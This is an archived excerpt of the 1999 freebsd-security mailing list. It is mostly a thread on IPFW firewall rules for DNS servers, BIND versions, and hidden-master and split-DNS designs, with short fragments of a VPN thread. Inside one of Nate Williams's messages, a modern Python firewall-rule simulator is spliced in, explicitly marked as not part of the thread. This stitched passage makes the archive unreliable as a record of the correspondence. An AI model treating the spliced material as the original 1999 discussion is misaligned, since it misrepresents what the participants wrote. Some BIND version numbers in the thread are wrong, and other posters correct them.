	be attacked.  The most common one is the DoS attack with version 4.9.7
	... which came shipped with FreeBSD for a while.

>
> *sigh*  Guess Bind is really in the same category as sendmail then.
> Unfortunately, BIND has its hooks all over the system, including the C
> library.  Can I just install the named and not worry about anything
> else, leaving the system the same?  The box in question is running
> 2.2.8, and I *really* don't want to upgrade it if I can avoid it.

	I would probably get the new bind 8.9.2 and run that.  I don't remember
	what version of BIND comes with 2.2.8 but I thought it was either 4.9.7
	or 8.9.1.  If it is 8.9.1, you can also run that with minimal problems.

*******************************************************************
Nick Rogness                    Shaw's Principle:
System Administrator              Build a system that even a fool
RapidNet, INC                     can use, and only a fool will
nick@rapidnet.com                 want to use it.
******************************************************************* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:54:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 1A6121501B for ; Mon, 23 Aug 1999 13:54:16 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id NAA36241; Mon, 23 Aug 1999 13:53:41 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908232053.NAA36241@gndrsh.dnsmgr.net> Subject: Re: IPFW/DNS rules In-Reply-To: <199908232024.OAA01685@mt.sri.com> from Nate Williams at "Aug 23, 1999 02:24:01 pm" To: nate@mt.sri.com (Nate Williams) Date: Mon, 23 Aug 1999 13:53:40 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > I have a public DNS server that I need people to be able to query, but > > > is there anything I can do to avoid anyone doing anything 'nasty' to it. > > > > Not a whole lot you can do here, other than keep on top of the latest > > versions of bind from ISC. > > *sigh* Guess Bind is really in the same category as sendmail then. > Unfortunately, BIND has it's hooks all over the system, including the C > library. Can I just install the named and not worry about anything > else, leaving the system the same? The box in question is running > 2.2.8, and I *really* don't want to upgrade it if I can avoid it. Go compile up the latest bind release, do what someone else said about turning this into a non-caching readonly server, I forget what option that is, etc. 
> (Note, this is a dedicated box w/out any accounts on it, so I don't care
> about non-external breakins. You can't get into it w/out SSH logins
> anyway....)

That makes it easier...

> > > Also, I need to open up access to it to those hosts that secondary me,
> > > as well as those I secondary for.
> >
> > That one is easy, 2 things to do. First, list those who are secondaries
> > for zones on this box in the named.conf options {allow_transfer{ip
> > list}};
> > ....
> > Second since xfers are done via TCP setup rules to allow only your secondaries
> > to ``setup'' connections to your primary, and allow your server to
> > ``setup'' connections to the servers it secondaries for.
>
> Can I setup firewall rules for this as well? Do normal queries require
> TCP connections? I'd like to be able to 'shutoff' TCP access to the box
> except from my secondaries if at all possible.

DNS queries and replies are usually done using udp, if and only if a udp
query fails will a client even try a tcp query. You can safely block
tcp queries, there just shouldn't really be any.

> Is there anywhere I can find the protocol information aside from using
> the source? Any good BIND books? (I've got the O'Reilly TCP book, but
> it's way out of date and not much help anymore...)

The protocol is documented in a fistful of RFC's, that and the source
are the best bet. I don't see why you need to dig much deeper than the
fact the DNS talks on udp and tcp port 53 if setup with listen-on and
query-source.

> > > (I also want to make sure that none of my internal hosts 'leak' DNS
> > > stuff, but that they also all go through the DNS server in order to find
> > > hosts...)
> > >
> > > I've got some rules in place, but if someone has gotten DNS firewall
> > > rules I'd be grateful to see them.
> >
> > These rules only log things, they are not meant to stop things, all logs
        ^^^^^^^^
You didn't pay attention to this very important point about what these
rules DO.
I also said later on how to change them to do what you wanted.

> > are carefully investigated (IP's blacked out to protect the parties and
> > myself, A.B.C.D is the inside DNS, W.X.Y.Z is the outside DNS, the other
> > 400 rules that don't deal with DNS blacked out as well :-)):
> >
> > ipfw add 10000 allow tcp from any to any established
> > ipfw add 10530 allow tcp from A.B.C.D to W.X.Y.Z 53 setup
>
> So far so good. You're limiting your firewall to only connect to a
> primary/secondary.
>
> > ipfw add 10539 allow log tcp from any to any 53
>
> This seems insecure to me. Any external host can connect to port 53 on
> your internal hosts. Also, internal hosts can 'leak' information out
> externally.

You missed the clause above about ``only log things'', change that
rule from ``allow log'' to ``deny log'' and it does just what you
wanted.

> > ipfw add 40530 allow udp from any to A.B.C.D 53
>
> Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta
> assume at some point. :)

A.B.C.D is YOUR DNS server, you are in control of how secure it is.

> > ipfw add 40530 allow udp from A.B.C.D 53 to any
> > ipfw add 40539 allow log udp from any to any 53
>
> This is *NOT* secure, just like the TCP port.

I'm ignoring this, you didn't read very carefully.

> > ipfw add 40539 allow log udp from any 53 to any
>
> This is also insecure, in that it allows anyone to use source port 53 to
> connect to *any* UDP port in your network.

You have no idea what my other 400 rules do. All those other UDP ports
are handled some place else. If you wanted a full firewall rule set,
well, that'll be $100/hr...

> Am I being paranoid? You betcha. A number of machines at work in
> another division were compromised recently, including one running a
> commercial firewall. Do I feel safe? Pretty much, but when things like
> this happen, you like to go through your system and crank everything
> down a couple more notches.
> :(
>

Somewhere right about here was this:

  To make this work for you change ``allow log'' to ``deny'' or ``deny log''.

Now go back to my original mail, make that change on the rules and see
how you like them.

> > Also the above rules don't include the inside DNS doing zone transfers
> > from outside DNS boxes. Add another 10530 rule:
> > ipfw add 10530 allow tcp from OUTSIDE to INSIDE 53 setup
>
> Yep.
>
> > Hope that helps...
>
> They look like mine except that mine are even more paranoid than yours.

I think that statement is false, but without a look at your rules I
can't tell you. I am a transit AS, I just can't go arbitrarily shutting
down services, so I do the next best thing, I allow things I expect to
go without any logging, but anything else gets logged. These rules are
actually built by a huge script that uses tons of variables and 100's
of IP address to concoct the minimum rule set to allow what I could
care less about and watch EVERYTHING else.

> However, I don't like what I have, and was hoping someone could tell me
> how to lock things down better.

Turn the box off? :-) :-)

> Any good books on this?

Not really, other than the standard references to Building Firewalls,
the fwtk documentation.
--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Mon Aug 23 13:58:38 1999
From: sthaug@nethelp.no
Date: Mon, 23 Aug 1999 22:57:47 +0200
To: nick@rapidnet.com
Cc: nate@mt.sri.com, freebsd@gndrsh.dnsmgr.net, freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: Your message of "Mon, 23 Aug 1999 14:48:47 -0600 (MDT)"
Message-ID: <99482.935441867@verdi.nethelp.no>

> I would probably get the new bind 8.9.2 and run that.

There is no 8.9.2. Maybe you mean 8.2.2? Not released yet, but it's
expected soon.

> I don't
> remember what version of BIND comes with 2.2.8

4.9.7-T1B

> but I thought it
> was either 4.9.7 or 8.9.1. If it is 8.9.1, you can also run that
> with minimal problems.

No such thing as 8.9.1 either. The newest release version of BIND is
8.2.1.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon Aug 23 14: 2:22 1999
From: sthaug@nethelp.no
Date: Mon, 23 Aug 1999 23:01:50 +0200
To: freebsd@gndrsh.dnsmgr.net
Cc: nate@mt.sri.com, freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: Your message of "Mon, 23 Aug 1999 13:53:40 -0700 (PDT)"
Message-ID: <596.935442110@verdi.nethelp.no>

> DNS queries and replies are usually done using udp, if and only if a udp
> query fails will a client even try a tcp query. You can safely block
> tcp queries, there just shouldn't really be any.

Life isn't that simple, unfortunately. There are some clients out there
that use TCP on a regular basis - early versions of a well known Internet
"server in a box" system based on FreeBSD, for instance :-)

Blocking TCP queries is not recommended.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon Aug 23 14: 8:43 1999
From: Nate Williams
Date: Mon, 23 Aug 1999 15:08:30 -0600
Message-Id: <199908232108.PAA02230@mt.sri.com>
To: "Rodney W. Grimes"
Cc: nate@mt.sri.com (Nate Williams), freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: <199908232053.NAA36241@gndrsh.dnsmgr.net>

> > > > I've got some rules in place, but if someone has gotten DNS firewall
> > > > rules I'd be grateful to see them.
> > >
> > > These rules only log things, they are not meant to stop things, all logs
>         ^^^^^^^^ You didn't pay attention to this very
> important point about what these rules DO. I also said later on how to
> change them to do what you wanted.

Sorry, you're right. I missed that.

> > > ipfw add 10539 allow log tcp from any to any 53
> >
> > This seems insecure to me. Any external host can connect to port 53 on
> > your internal hosts. Also, internal hosts can 'leak' information out
> > externally.
>
> You missed the clause above about ``only log things'', change that
> rule from ``allow log'' to ``deny log'' and it does just what you
> wanted.

Gotcha. See below.

> > > ipfw add 40530 allow udp from any to A.B.C.D 53
> >
> > Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta
> > assume at some point. :)
>
> A.B.C.D is YOUR DNS server, you are in control of how secure it is.

I know, I was (attempting) to be funny. Obviously I failed. :(

> > > ipfw add 40530 allow udp from A.B.C.D 53 to any
> > > ipfw add 40539 allow log udp from any to any 53
> >
> > This is *NOT* secure, just like the TCP port.
>
> I'm ignoring this, you didn't read very carefully.

Right, it's the next rule that I *needed* though...

> > > ipfw add 40539 allow log udp from any 53 to any
> >
> > This is also insecure, in that it allows anyone to use source port 53 to
> > connect to *any* UDP port in your network.
>
> You have no idea what my other 400 rules do. All those other UDP ports
> are handled some place else. If you wanted a full firewall rule set,
> well, that'll be $100/hr...

I've done my best, but I couldn't figure out a 'clean, efficient, and
safe' way of allowing DNS (and NTP, which is in the same boat) to work.
The rules before must disallow connections, but I don't see how you can
do that and still allow connections from port 53.

> > However, I don't like what I have, and was hoping someone could tell me
> > how to lock things down better.
>
> Turn the box off? :-) :-)

Yeah, wouldn't that be easy.
:)

Nate

From owner-freebsd-security Mon Aug 23 14: 9:19 1999
From: Nate Williams
Date: Mon, 23 Aug 1999 15:09:12 -0600
Message-Id: <199908232109.PAA02237@mt.sri.com>
To: sthaug@nethelp.no
Cc: freebsd@gndrsh.dnsmgr.net, nate@mt.sri.com, freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: <596.935442110@verdi.nethelp.no>

> > DNS queries and replies are usually done using udp, if and only if a udp
> > query fails will a client even try a tcp query. You can safely block
> > tcp queries, there just shouldn't really be any.
>
> Life isn't that simple, unfortunately. There are some clients out there
> that use TCP on a regular basis - early versions of a well known Internet
> "server in a box" system based on FreeBSD, for instance :-)
>
> Blocking TCP queries is not recommended.

I may just 'log' TCP queries then, to see what's what. If I never get
any hits, I will probably later on block them.
Nate

From owner-freebsd-security Mon Aug 23 15:17:42 1999
From: "Rodney W. Grimes"
Message-Id: <199908232216.PAA36434@gndrsh.dnsmgr.net>
Subject: Re: IPFW/DNS rules
In-Reply-To: <596.935442110@verdi.nethelp.no> from "sthaug@nethelp.no" at "Aug 23, 1999 11:01:50 pm"
To: sthaug@nethelp.no
Date: Mon, 23 Aug 1999 15:16:38 -0700 (PDT)
Cc: nate@mt.sri.com, freebsd-security@FreeBSD.ORG

> > DNS queries and replies are usually done using udp, if and only if a udp
> > query fails will a client even try a tcp query. You can safely block
> > tcp queries, there just shouldn't really be any.
>
> Life isn't that simple, unfortunately. There are some clients out there
> that use TCP on a regular basis - early versions of a well known Internet
> "server in a box" system based on FreeBSD, for instance :-)
>
> Blocking TCP queries is not recommended.

It's not a problem for me, but it may be for Nate. Nothing should be
doing public queries to my master DNS servers, they aren't even listed
in the SOA for the zones. The outside and public DNS servers do allow
TCP to them, but it is logged, and I haven't seen one in a month, so
either the above is not very widely deployed, or they have ``fixed'' it.
--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Mon Aug 23 15:34:46 1999
From: "Rodney W. Grimes"
Message-Id: <199908232234.PAA36466@gndrsh.dnsmgr.net>
Subject: Re: IPFW/DNS rules
In-Reply-To: <199908232108.PAA02230@mt.sri.com> from Nate Williams at "Aug 23, 1999 03:08:30 pm"
To: nate@mt.sri.com (Nate Williams)
Date: Mon, 23 Aug 1999 15:34:20 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG

> > > > > I've got some rules in place, but if someone has gotten DNS firewall
> > > > > rules I'd be grateful to see them.
> > > >
> > > > These rules only log things, they are not meant to stop things, all logs
> >         ^^^^^^^^ You didn't pay attention to this very
> > important point about what these rules DO. I also said later on how to
> > change them to do what you wanted.
>
> Sorry, you're right. I missed that.
>
> > > > ipfw add 10539 allow log tcp from any to any 53
> > >
> > > This seems insecure to me. Any external host can connect to port 53 on
> > > your internal hosts. Also, internal hosts can 'leak' information out
> > > externally.
> >
> > You missed the clause above about ``only log things'', change that
> > rule from ``allow log'' to ``deny log'' and it does just what you
> > wanted.
>
> Gotcha. See below.
> > > > > ipfw add 40530 allow udp from any to A.B.C.D 53
> > > >
> > > > Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta
> > > > assume at some point. :)
> > >
> > > A.B.C.D is YOUR DNS server, you are in control of how secure it is.
>
> I know, I was (attempting) to be funny. Obviously I failed. :(

I missed the :), too few characters for my parser to see it as a smiley,
I'll have to go look for the bug in it, must be an off by one error,
nope it was a bad regex, needed 3 characters to trigger it, fixed :-)

...

> > > > ipfw add 40539 allow log udp from any 53 to any
> > >
> > > This is also insecure, in that it allows anyone to use source port 53 to
> > > connect to *any* UDP port in your network.
> >
> > You have no idea what my other 400 rules do. All those other UDP ports
> > are handled some place else. If you wanted a full firewall rule set,
> > well, that'll be $100/hr...
>
> I've done my best, but I couldn't figure out a 'clean, efficient, and
> safe' way of allowing DNS (and NTP, which is in the same boat) to work.
> The rules before must disallow connections, but I don't see how you can
> do that and still allow connections from port 53.

Yes, my rules before these have large blocks of udp/tcp ports that log
their activity, for what you want it would be something like:

ipfw add 100 deny log tcp from any 1-52 to any
ipfw add 100 deny log tcp from any 54-65535 to any
ipfw add 200 deny log udp from any 1-52 to any
ipfw add 200 deny log udp from any 54-65535 to any

And of course, the reverse rules

ipfw add 300 deny log tcp from any to any 1-52
ipfw add 300 deny log tcp from any to any 54-65535
ipfw add 400 deny log udp from any to any 1-52
ipfw add 400 deny log udp from any to any 54-65535

Now you get what I am doing? The above scripts would in effect shutdown
all IP packets except tcp/udp port 53 before it ever hit my other rules.
Now, I don't use that wide of port ranges in the real rule set, but
there are some pretty big ones that cover a 100 or so ports here and
there.

> > > However, I don't like what I have, and was hoping someone could tell me
> > > how to lock things down better.
> >
> > Turn the box off? :-) :-)
>
> Yeah, wouldn't that be easy. :)

Outsource your DNS services so that no public queries ever hit your
master would be another way. This is known as a hidden master DNS
server, you simply get 2 public secondaries, list them in the SOA
for the zone, but leave out the real master. No one even knows to
go look at your box, except if they break into the slaves.

If you only have a few zones, dnsmgr.net could deal with them for you...

--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Mon Aug 23 15:39:13 1999
Date: Tue, 24 Aug 1999 00:35:38 +0200
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Cc: Nate Williams
Subject: Re: IPFW/DNS rules
Message-ID: <19990824003538.A27031@keltia.freenix.fr>
In-Reply-To: <199908232024.OAA01685@mt.sri.com>;
    from Nate Williams on Mon, Aug 23, 1999 at 02:24:01PM -0600

According to Nate Williams:
> This seems insecure to me. Any external host can connect to port 53 on
> your internal hosts. Also, internal hosts can 'leak' information out
> externally.

If you don't want to leak information, use a double DNS. The method is
described in B. Chapman's book on firewalls.

It is fairly, you have two machines, one serving the external DNS with
only a few records and another one, serving the inside DNS. The external
machine is _client_ of the internal DNS and the internal DNS is
forwarding every query that it doesn't know about to the external one.

That way, you can't leak information.

Beware that you'll find DNS info in the Received: headers added by your
mailservers.

You can do it on one machine if you use a very recent bind version
because it can bind to specific interfaces so you can run two instances
of bind.

> Any good books on this?

See the book from Brent Chapman.

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999

From owner-freebsd-security Mon Aug 23 15:55:47 1999
From: Nate Williams
Date: Mon, 23 Aug 1999 16:55:34 -0600
Message-Id: <199908232255.QAA02707@mt.sri.com>
To: "Rodney W. Grimes"
Cc: nate@mt.sri.com (Nate Williams), freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: <199908232234.PAA36466@gndrsh.dnsmgr.net>

> > > > > ipfw add 40539 allow log udp from any 53 to any
> > > >
> > > > This is also insecure, in that it allows anyone to use source port 53 to
> > > > connect to *any* UDP port in your network.

...
>
> Yes, my rules before these have large blocks of udp/tcp ports that log
> their activity, for what you want it would be something like:
>
> ipfw add 100 deny log tcp from any 1-52 to any
> ipfw add 100 deny log tcp from any 54-65535 to any
> ipfw add 200 deny log udp from any 1-52 to any
> ipfw add 200 deny log udp from any 54-65535 to any
>
> And of course, the reverse rules
> ipfw add 300 deny log tcp from any to any 1-52
> ipfw add 300 deny log tcp from any to any 54-65535
> ipfw add 400 deny log udp from any to any 1-52
> ipfw add 400 deny log udp from any to any 54-65535

Except that you're still allowing connections *from* port 53 to any UDP
service in your network, which bothers me. (I'm doing it as well, FWIW,
although I'm limiting it to a single box.)

*sigh*

> Outsource your DNS services so that no public queries ever hit your
> master would be another way. This is known as a hidden master DNS
> server, you simply get 2 public secondaries, list them in the SOA
> for the zone, but leave out the real master. No one even knows to
> go look at your box, except if they break into the slaves.

Ahh, this is an idea. This is essentially what I'm doing now, except I
didn't think to hide the master.

However, we are trying to be more and more 'independent' of the parent
company, so for now I think we'll deal with the paranoia. Also, I don't
trust the people who are my secondaries as much to be secure.
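As an added example that is not part of the thread, here is a small Python first-match simulator for the rules quoted above (Rod's port-53-only deny blocks followed by the DNS rules from his original mail), run over constructed packets; it also goes beyond the text by trying an ordinary client query from an ephemeral port and by running the DNS rules without the blocks. The addresses 10.0.0.53, 192.0.2.10, 198.51.100.5 and 10.0.0.77 are constructed stand-ins for A.B.C.D, W.X.Y.Z and an outside and inside host, and the `port53_only`/`log_action` switches are this example's own.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

ANY = None  # wildcard address / port range
# Constructed stand-ins for the addresses blacked out in the thread.
A_B_C_D, W_X_Y_Z = "10.0.0.53", "192.0.2.10"      # inside DNS, outside DNS
OUTSIDE, INSIDE = "198.51.100.5", "10.0.0.77"     # other external / internal host


@dataclass(frozen=True)
class Packet:
    proto: str            # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False     # TCP SYN flag
    ack: bool = False     # TCP ACK flag


def _in_range(rng: Optional[Tuple[int, int]], port: int) -> bool:
    return rng is ANY or rng[0] <= port <= rng[1]


@dataclass(frozen=True)
class Rule:
    number: int
    action: str                           # "allow" or "deny"
    proto: str
    src: Optional[str] = ANY
    sport: Optional[Tuple[int, int]] = ANY
    dst: Optional[str] = ANY
    dport: Optional[Tuple[int, int]] = ANY
    log: bool = False
    setup: bool = False                   # ipfw "setup": SYN set, ACK clear
    established: bool = False             # ipfw "established": ACK set

    def matches(self, p: Packet) -> bool:
        return (self.proto == p.proto
                and self.src in (ANY, p.src) and self.dst in (ANY, p.dst)
                and _in_range(self.sport, p.sport) and _in_range(self.dport, p.dport)
                and (not self.setup or (p.syn and not p.ack))
                and (not self.established or p.ack))


def evaluate(rules: List[Rule], p: Packet) -> Tuple[str, int]:
    """First-match walk in ascending rule number, insertion order within a
    number (as ipfw does); anything unmatched hits the default deny 65535."""
    for r in sorted(rules, key=lambda r: r.number):  # sorted() is stable
        if r.matches(p):
            return r.action, r.number
    return "deny", 65535


def rule_set(port53_only: bool = True, log_action: str = "allow") -> List[Rule]:
    """Rod's sketch: deny-log blocks for every port but 53 (optional, so the
    effect of leaving them out can be compared), then the DNS rules from his
    original mail. log_action is the action of rules 10539/40539, which he
    says to change from ``allow log`` to ``deny log``."""
    blocks = [
        Rule(100, "deny", "tcp", sport=(1, 52), log=True),
        Rule(100, "deny", "tcp", sport=(54, 65535), log=True),
        Rule(200, "deny", "udp", sport=(1, 52), log=True),
        Rule(200, "deny", "udp", sport=(54, 65535), log=True),
        Rule(300, "deny", "tcp", dport=(1, 52), log=True),
        Rule(300, "deny", "tcp", dport=(54, 65535), log=True),
        Rule(400, "deny", "udp", dport=(1, 52), log=True),
        Rule(400, "deny", "udp", dport=(54, 65535), log=True),
    ]
    dns = [
        Rule(10000, "allow", "tcp", established=True),
        Rule(10530, "allow", "tcp", src=A_B_C_D, dst=W_X_Y_Z, dport=(53, 53), setup=True),
        Rule(10539, log_action, "tcp", dport=(53, 53), log=True),
        Rule(40530, "allow", "udp", dst=A_B_C_D, dport=(53, 53)),
        Rule(40530, "allow", "udp", src=A_B_C_D, sport=(53, 53)),
        Rule(40539, log_action, "udp", dport=(53, 53), log=True),
        Rule(40539, log_action, "udp", sport=(53, 53), log=True),
    ]
    return (blocks if port53_only else []) + dns


# Constructed packets covering the cases argued about in the thread.
SAMPLES: Dict[str, Packet] = {
    "udp_server_out":  Packet("udp", A_B_C_D, 53, W_X_Y_Z, 53),    # query-source port 53
    "udp_server_in":   Packet("udp", W_X_Y_Z, 53, A_B_C_D, 53),
    "udp_sport53_any": Packet("udp", OUTSIDE, 53, INSIDE, 111),    # Nate's worry
    "udp_client":      Packet("udp", OUTSIDE, 3456, A_B_C_D, 53),  # ephemeral source port
    "tcp_xfer_setup":  Packet("tcp", A_B_C_D, 53, W_X_Y_Z, 53, syn=True),
    "tcp_any_to_53":   Packet("tcp", OUTSIDE, 53, A_B_C_D, 53, syn=True),
}


def audit(rules: List[Rule]) -> Dict[str, Tuple[str, int]]:
    """Map each sample packet name to the (action, rule) that decided it."""
    return {name: evaluate(rules, p) for name, p in SAMPLES.items()}
```

With the blocks in place the source-port-53 packet is denied at rule 400 before 40539 ever sees it, which is Rod's point, but the ephemeral-port client query is denied at rule 200 too, so as sketched the blocks only pass 53-to-53 traffic (servers set up with query-source port 53). That is the check to run on the real rule set before relying on it.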
Nate

From owner-freebsd-security Mon Aug 23 15:57:26 1999
From: Nate Williams
Date: Mon, 23 Aug 1999 16:56:55 -0600
Message-Id: <199908232256.QAA02724@mt.sri.com>
To: Ollivier Robert
Cc: freebsd-security@FreeBSD.ORG, Nate Williams
Subject: Re: IPFW/DNS rules
In-Reply-To: <19990824003538.A27031@keltia.freenix.fr>

> > This seems insecure to me. Any external host can connect to port 53 on
> > your internal hosts. Also, internal hosts can 'leak' information out
> > externally.
>
> If you don't want to leak information, use a double DNS. The method is
> described in B. Chapman's book on firewalls.
>
> It is fairly, you have two machines, one serving the external DNS with only a
> few records and another one, serving the inside DNS. The external machine is
> _client_ of the internal DNS and the internal DNS is forwarding every query
> that it doesn't know about to the external one.
>
> That way, you can't leak information.
>
> Beware that you'll find DNS info in the Received: headers added by your
> mailservers.

Yep, but the mailserver information isn't anything I'm not already
exposing via MX records and such.

> You can do it on one machine if you use a very recent bind version because it
> can bind to specific interfaces so you can run two instances of bind.

Interesting. Sounds like I need to get the new BIND/TCP book from
O'Reilly and the Chapman firewall book.

Thanks to all, this was an interesting learning experience for me...

Nate

From owner-freebsd-security Mon Aug 23 16: 8:30 1999
Message-ID: <37C1D419.B844DCE@softweyr.com>
Date: Mon, 23 Aug 1999 17:07:05 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Warner Losh
Cc: E Kovarski, Alex Nash, freebsd-security@FreeBSD.ORG, advocacy@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
Warner Losh wrote:
>
> In message <37C19181.9046615A@softweyr.com> Wes Peters writes:
> : Several others have asked for this as well, so here's the first
> : mention of it:
> : http://www.computerworld.com/home/news.nsf/all/9908102chaos
>
> Yes, but where's the claymation MPEG of the Linux Death Match :-)

Where is Nick Park when you need him?

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                Softweyr LLC
http://softweyr.com/                                  wes@softweyr.com

From owner-freebsd-security Mon Aug 23 17: 3:31 1999
From: "Rodney W. Grimes"
Message-Id: <199908240003.RAA36810@gndrsh.dnsmgr.net>
Subject: Re: IPFW/DNS rules
In-Reply-To: <199908232255.QAA02707@mt.sri.com> from Nate Williams at "Aug 23, 1999 04:55:34 pm"
To: nate@mt.sri.com (Nate Williams)
Date: Mon, 23 Aug 1999 17:03:21 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG

> > > > > > ipfw add 40539 allow log udp from any 53 to any
> > > > >
> > > > > This is also insecure, in that it allows anyone to use source port 53 to
> > > > > connect to *any* UDP port in your network.
> ...
> >
> > Yes, my rules before these have large blocks of udp/tcp ports that log
> > their activity, for what you want it would be something like:
> >
> > ipfw add 100 deny log tcp from any 1-52 to any
> > ipfw add 100 deny log tcp from any 54-65535 to any
> > ipfw add 200 deny log udp from any 1-52 to any
> > ipfw add 200 deny log udp from any 54-65535 to any
> >
> > And of course, the reverse rules
> > ipfw add 300 deny log tcp from any to any 1-52
> > ipfw add 300 deny log tcp from any to any 54-65535
> > ipfw add 400 deny log udp from any to any 1-52
> > ipfw add 400 deny log udp from any to any 54-65535
>
> Except that you're still allowing connections *from* port 53 to any UDP
> service in your network, which bothers me. (I'm doing it as well, FWIW,
> although I'm limiting it to a single box.)
>
> *sigh*

If you want me to write you a complete set of rules, you'll have to pay
for that. I've given you the data you need to create a correct set,
you're just not looking at it right.

> > Outsource your DNS services so that no public queries ever hit your
> > master would be another way. This is known as a hidden master DNS
> > server, you simply get 2 public secondaries, list them in the SOA
> > for the zone, but leave out the real master. No one even knows to
> > go look at your box, except if they break into the slaves.
>
> Ahh, this is an idea. This is essentially what I'm doing now, except I
> didn't think to hide the master.

:-), lots of folks do this, especially when the real master is sitting
on the long side of anything slower than fractional T1.

> However, we are trying to be more and more 'independent' of the parent
> company, so for now I think we'll deal with the paranoia. Also, I don't
> trust the people who are my secondaries as much to be secure.
>
> Nate

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Tue Aug 24 0:42:34 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 2E19014CF3 for ; Tue, 24 Aug 1999 00:42:30 -0700 (PDT) (envelope-from nick@rapidnet.com)
Received: from localhost (nick@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id BAA08854; Tue, 24 Aug 1999 01:40:01 -0600 (MDT)
Date: Tue, 24 Aug 1999 01:40:01 -0600 (MDT)
From: Nick Rogness
To: sthaug@nethelp.no
Cc: nate@mt.sri.com, freebsd@gndrsh.dnsmgr.net, freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: <99482.935441867@verdi.nethelp.no>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 23 Aug 1999 sthaug@nethelp.no wrote:

>
> There is no 8.9.2. Maybe you mean 8.2.2? Not released yet, but it's
> expected soon.

My mistake, 8.2.1 is right. 8.1.2 comes shipped with FBSD 3.1 & 3.2.

*******************************************************************
Nick Rogness                           Shaw's Principle:
System Administrator                   Build a system that even a fool
RapidNet, INC                          can use, and only a fool will
nick@rapidnet.com                      want to use it.
*******************************************************************

From owner-freebsd-security Tue Aug 24 2:19:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from awfulhak.org (dynamic-123.max1-du-ws.dialnetwork.pavilion.co.uk [212.74.8.123]) by hub.freebsd.org (Postfix) with ESMTP id 29FB6153CD; Tue, 24 Aug 1999 02:19:40 -0700 (PDT) (envelope-from brian@Awfulhak.org)
Received: from keep.lan.Awfulhak.org (root@keep.lan.Awfulhak.org [172.16.0.8]) by awfulhak.org (8.9.3/8.9.3) with ESMTP id JAA04671; Tue, 24 Aug 1999 09:28:15 +0100 (BST) (envelope-from brian@lan.awfulhak.org)
Received: from keep.lan.Awfulhak.org (brian@localhost.lan.Awfulhak.org [127.0.0.1]) by keep.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id JAA91459; Tue, 24 Aug 1999 09:31:32 +0100 (BST) (envelope-from brian@keep.lan.Awfulhak.org)
Message-Id: <199908240831.JAA91459@keep.lan.Awfulhak.org>
X-Mailer: exmh version 2.0.2 2/24/98
To: "Jordan K. Hubbard"
Cc: Darren Reed , petrilli@amber.org (Christopher Petrilli), freebsd-security@FreeBSD.org, jdp@FreeBSD.org
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-reply-to: Your message of "Sun, 22 Aug 1999 20:42:46 PDT." <4726.935379766@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 24 Aug 1999 09:31:31 +0100
From: Brian Somers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

jkh@zippy.cdrom.com said:
> Bay Area region. We've already talked to our lawyer, he said it
> looked legit to him, and so we've been shipping crypto on our CDs for
> over a year now. I even announced it back then, to almost no audience
> reaction whatsoever. It seems that people like to get more excited
> about the prospect of something being closed than it being opened up.
> :)

Shouldn't etc/cvsup/ (from the cvsup-mirror port) be updated to reflect this ?
I believe a lot of people don't know about the lack of restrictions in SF, and the fact that cvsup-mirror gets the crypto stuff from South Africa doesn't exactly drive the point home :-]

--
Brian

Don't _EVER_ lose your sense of humour !

From owner-freebsd-security Tue Aug 24 9:16:16 1999
